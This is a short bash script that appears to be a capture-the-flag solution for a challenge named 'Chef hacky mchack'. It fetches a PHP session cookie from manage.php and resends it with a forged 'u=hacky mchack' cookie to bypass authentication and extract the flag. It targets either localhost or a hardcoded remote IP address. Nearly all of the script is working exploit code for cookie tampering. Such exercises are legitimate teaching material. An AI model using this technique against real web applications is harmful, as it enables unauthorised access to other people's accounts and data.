#!/bin/bash
PORT=8087

if [[ $1 == "local" ]]
then
    remote='http://127.0.0.1:'$PORT
elif [[ $1 == "remote" ]] && [[ -z $2 ]] 
then
    remote='http://141.85.224.157:'$PORT
else
    remote=$1':'$2
fi

# Chef hacky mchack
echo "Start exploit for Chef hacky mchack"
remote=$remote'/manage.php'
curl -s -c cookies.txt -o /dev/null $remote
phpsessid=$(cat cookies.txt | grep PHPSESSID | awk '{print $7}')
flag=$(curl -s -b 'PHPSESSID='$phpsessid';u=hacky mchack' $remote | grep -o "SSS{.*}")
echo "Flag is $flag"
echo "----------------------------"
